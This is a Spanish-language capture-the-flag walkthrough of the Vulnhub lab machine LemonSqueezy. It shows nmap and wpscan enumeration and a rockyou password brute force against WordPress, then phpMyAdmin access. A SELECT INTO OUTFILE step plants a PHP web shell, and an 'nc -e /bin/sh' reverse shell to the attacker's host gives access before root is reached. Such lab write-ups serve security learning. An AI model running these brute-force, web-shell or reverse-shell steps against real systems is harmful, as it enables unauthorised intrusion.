Hoy vamos a hackear la maquina de Vulnhub llamada
LemonSqueezy. Podeis descargarla desde el siguiente enlace:
LemonSqueezy
Video
Enumeration
Empezamos con un nmap para ver que puertos
tiene abiertos.
sml@Cassandra:~$ nmap -A -p- 192.168.1.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 21:29 CEST
Nmap scan report for lemonsqueezy.home (192.168.1.10)
Host is up (0.00054s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.42 seconds
Vemos que solo tiene el puerto 80 abierto, asi que vamos
a profundizar un poco mas.
Tiene un par de directorios interesantes, wordpress
y phpmyadmin.
Exploramos el wordpress a ver si podemos sacar algo de informacion:
sml@Cassandra:~$ wpscan --url http://192.168.1.10/wordpress --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N][+] URL:
http://192.168.1.10/wordpress/ [192.168.1.10]
[+] Started: Wed May 6 21:33:00 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.1.10/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce
ss
[+] http://192.168.1.10/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled:
http://192.168.1.10/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled:
http://192.168.1.10/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.1.10/wordpress/, Match:
'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.1.10/wordpress/, Match: 'WordPress 4.8.9'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00
<===============================================================================
========> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] orange
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] lemon
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been
output.
[!] You can get a free API token with 50 daily requests by registering at
https://wpvulndb.com/users/sign_up
[+] Finished: Wed May 6 21:33:02 2020
[+] Requests Done: 26
[+] Cached Requests: 26
[+] Data Sent: 6.488 KB
[+] Data Received: 227.2 KB
[+] Memory used: 110.84 MB
[+] Elapsed time: 00:00:01
Encontramos a los usuarios orange y lemon :)
Hacemos bruteforce a la password de orange usando rockyou.
sml@Cassandra:~$ wpscan --url http://192.168.1.10/wordpress --passwords
rockyou.txt --usernames orange –max-threads 50
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.1.10/wordpress/ [192.168.1.10]
[+] Started: Wed May 6 21:39:55 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.1.10/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce
ss
[+] http://192.168.1.10/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled:
http://192.168.1.10/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled:
http://192.168.1.10/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.1.10/wordpress/, Match:
'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.1.10/wordpress/, Match: 'WordPress 4.8.9'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00
<===============================================================================
=========> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
Trying orange / ginger Time: 00:00:02
<===============================================================================
===========> (165 / 165) 100.00% Time: 00:00:02
[SUCCESS] - orange / ginger
[!] Valid Combinations Found:
| Username: orange, Password: ginger
[!] No WPVulnDB API Token given, as a result vulnerability data has not been
output.
[!] You can get a free API token with 50 daily requests by registering at
https://wpvulndb.com/users/sign_up
[+] Finished: Wed May 6 21:40:18 2020
[+] Requests Done: 189
[+] Cached Requests: 26
[+] Data Sent: 90.547 KB
[+] Data Received: 104.191 KB
[+] Memory used: 930.492 MB
[+] Elapsed time: 00:00:22
Obtenemos la pass "ginger".
Nos logueamos en wordpress con los credenciales
de orange/ginger, en posts, hay un draft "keep this safe!"
que contiene: n0t1n@w0rdl1st!
Tiene pinta de ser una password :)
Entramos en http://192.168.1.10/phpmyadmin/ y usamos
los credenciales orange/n0t1n@w0rdl1st! para loguearnos.
Exploitation
Una vez dentro del phpmyadmin, vamos a crear un fichero "b.php" que
utilizaremos para obtener una reverse shell, asi que, abrimos
"console" y ponemos:
SELECT "" into outfile
"/var/www/html/wordpress/b.php"
Ponemos nc a la escucha:
sml@Cassandra:~$ nc -nlvp 5555
Y visitamos:
http://lemonsqueezy/wordpress/b.php?cmd=nc -e /bin/sh 192.168.1.148 5555
Low Shell
sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.10] 42244
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Ya estamos dentro :)
user.txt
$ cd /var/www
$ ls
html user.txt
$ cat user.txt
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH
Post-Exploitation
Exploramos el sistema y vemos que tenemos permiso de
escritura en /var/www/html/wordpress.
Nos descargamos el fichero linpeas.sh[1] y vemos
la salida a ver si nos muestra algo interesante...
sml@Cassandra:~$ nc -nlvp 6666
listening on [any] 6666 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.10] 33404
python -c 'import pty; pty.spawn("/bin/sh")'
# id
uid=0(root) gid=0(root) groups=0(root)
root.txt
# cd /root
# ls
root.txt
# cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=
End
Y con esto ya seriamos root de la maquina :)
[1]https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh